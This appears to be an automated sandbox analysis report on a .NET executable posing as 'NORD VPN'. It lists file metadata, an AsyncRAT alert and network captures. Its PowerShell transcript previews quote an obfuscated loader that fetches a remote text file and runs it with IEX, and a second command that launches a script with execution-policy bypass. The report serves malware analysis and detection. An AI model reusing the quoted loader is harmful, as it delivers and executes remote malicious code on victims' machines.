                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vivyprwg.nre.ps1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdrybsou.rmb.psm1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\Documents\20210611\PowerShell_transcript.715575.7kfD7GZs.20210611063402.txt
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 2162
Entropy (8bit): 5.252882108289744
Encrypted: false
SSDEEP: 48:BZqvhqZoOG/A5G5QMTbqDYB1Zb/A5G5QMc:BZ2hqZNG/3Q4qDo1Zb/3QD
MD5: 9B86905AA5C26D14CF48E674C74987F8
SHA1: 379EFDA2ACCBB4A6CBA9B77A3FACD0D68C4097E1
SHA-256: 9445D96838C2D5DA7DBD32319509019267D583FBB58F9C45EAF36D893B749DE2
SHA-512: 4C9E0C3607A22EB5D5F21EEA152213F7A1FAA99B8D0A79900926E0DE41015FDC760714456C565D8B957EFE7AD260C4FEFE54EC42DA0F2CAC0423FE322B9BD039
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20210611063402..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFF
C:\Users\user\Documents\20210611\PowerShell_transcript.715575.rFlTN3zv.20210611063435.txt
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 2547
Entropy (8bit): 5.443575116223148
Encrypted: false
SSDEEP: 48:BZcvhqZoOas8XqDYB1ZhZ3vhqZoOas8XqDYB1ZHpJ1vqAfG7eJ1vqAfG7d:BZMhqZNL6qDo1ZhZfhqZNL6qDo1ZHpTs
MD5: 2F83B1ABF6F78BEDD9B49AFF43D35A2F
SHA1: 777ECB2C0A0E855757DC721A3A28C202FDA66767
SHA-256: ED881F0E6B02711913C43F0142A80C4822FD54270C0861A4BEDB947A73DCA75B
SHA-512: 08A14BAF6D1C9521A51E79E96C4D8D4C3AD850895E4DF934B54D3C5EEE8F3534692E25DCF3D0516D80664CA06C32BDB943327A8C7004A660E260CB26C73A3A0D
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20210611063435..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1..Process ID: 3680..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20210611063928..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 3.5769726079767405
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: xGrfj8RvYg.exe
File size: 20480
MD5: 722603aa75534bec9d1191f062fb2c03
SHA1: 321ea5aa8368f394dcbdcc6ce7ebaab89861150d
SHA256: 3e7cecddd88f1fdc8eb055ef6ab1eacfadb706582cb0fe190d99e493baa78691
SHA512: 04e83e82740789a1d65f26c68076b1ac8b183f378d8f9f58ce8fba55f26276edf4058abdebeabf7b9d37432a64671021a30450e136c736cad57f06a7953e5fb3
SSDEEP: 192:9DPhbcIbsHy0369P99j999M99Du999W999969999939999p99999799999A9999L:9DZcIISYI3G
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......>......".... ...@....@.. ....................................@................................

File Icon

Icon Hash: f0ce284e86879ccd

Static PE Info

General

Entrypoint: 0x402e22
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0xDE169215 [Tue Jan 27 05:52:21 2088 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2dcf           0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x4000           0x3b24        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x2d30           0x38          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0xe28         0x1000    False     0.490234375      data       4.92008205051    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x4000           0x3b24        0x3c00    False     0.155859375      data       2.95852725153    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x8000           0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name           RVA     Size    Type                                                                         Language  Country
RT_ICON        0x4100  0x34b4  data
RT_GROUP_ICON  0x75c4  0x14    data
RT_VERSION     0x75e8  0x33c   data
RT_MANIFEST    0x7934  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2021
Assembly Version  1.0.0.0
InternalName      NORD VPN.exe
FileVersion       1.0.0.0
CompanyName       NORD VPN
LegalTrademarks
Comments          NORD VPN
ProductName       NORD VPN
ProductVersion    1.0.0.0
FileDescription   NORD VPN
OriginalFilename  NORD VPN.exe

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                                  Source Port  Dest Port  Source IP      Dest IP
06/11/21-06:34:57.477264  TCP       2030673  ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)  1107         49747      216.230.75.62  192.168.2.3

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jun 11, 2021 06:34:00.386857033 CEST  49715        443        192.168.2.3      207.241.227.112
Jun 11, 2021 06:34:00.592504978 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:00.593013048 CEST  49715        443        192.168.2.3      207.241.227.112
Jun 11, 2021 06:34:00.611608028 CEST  49715        443        192.168.2.3      207.241.227.112
Jun 11, 2021 06:34:00.816865921 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:00.816925049 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:00.816960096 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:00.817001104 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:00.817030907 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:00.817200899 CEST  49715        443        192.168.2.3      207.241.227.112
Jun 11, 2021 06:34:00.820400953 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:00.820432901 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:00.820518017 CEST  49715        443        192.168.2.3      207.241.227.112
Jun 11, 2021 06:34:00.820571899 CEST  49715        443        192.168.2.3      207.241.227.112
Jun 11, 2021 06:34:00.886559963 CEST  49715        443        192.168.2.3      207.241.227.112
Jun 11, 2021 06:34:01.092087984 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:01.092324018 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:01.092437029 CEST  49715        443        192.168.2.3      207.241.227.112
Jun 11, 2021 06:34:01.159507036 CEST  49715        443        192.168.2.3      207.241.227.112
Jun 11, 2021 06:34:01.367537975 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:01.367827892 CEST  443          49715      207.241.227.112  192.168.2.3
Jun 11, 2021 06:34:01.367949963 CEST  49715        443        192.168.2.3      207.241.227.112
Jun 11, 2021 06:34:04.742163897 CEST  443          49715      207.241.227.112  192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:04.742221117 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:04.742320061 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:04.742366076 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.144542933 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.349219084 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.349448919 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.377583027 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.581588030 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583529949 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583573103 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583611012 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583637953 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583709002 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583765030 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.587261915 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.587302923 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.587429047 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.588885069 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.793080091 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.793298960 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.821546078 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.026498079 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.026823044 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.026899099 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.026947021 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.027025938 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.068955898 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:07.025002003 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:07.025049925 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:07.025233030 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:09.588546991 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.806397915 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.881453991 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.086833000 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.087049007 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.087373972 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.293823957 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.293888092 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.293930054 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.293967009 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.293993950 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.294092894 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.294146061 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.297117949 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.297152996 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.297298908 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.298930883 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.505347967 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.505788088 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.506927013 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.714204073 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.716938972 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.773483038 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.795209885 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.000025034 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.001348019 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.001825094 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206243992 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206476927 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206526041 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206563950 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206592083 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206643105 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206732988 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.208666086 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.208700895 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.208810091 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.213979959 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.419667006 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.424873114 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.655775070 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.695528030 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.716933012 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.716984987 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.717125893 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.723805904 CEST49729443192.168.2.3207.241.232.198
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.929640055 CEST44349729207.241.232.198192.168.2.3

UDP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                                                                                                  Jun 11, 2021 06:34:11.621920109 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.809737921 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.880702019 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.730957031 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.794511080 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.659003973 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.723062992 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:26.094538927 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:26.171586037 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:29.830260038 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:29.891926050 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:48.423593044 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:48.484875917 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:51.268249989 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:51.420285940 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.042872906 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.188497066 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.801496983 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.817574024 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.863476992 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.893306017 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:53.325093031 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:53.388535023 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:53.975155115 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:54.036981106 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.138559103 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.197886944 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.725730896 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.786588907 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:56.619487047 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:56.679840088 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.957540989 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:58.016989946 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:59.056586981 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:59.117165089 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:07.309668064 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:35:07.370659113 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:40.151109934 CEST5570853192.168.2.38.8.8.8
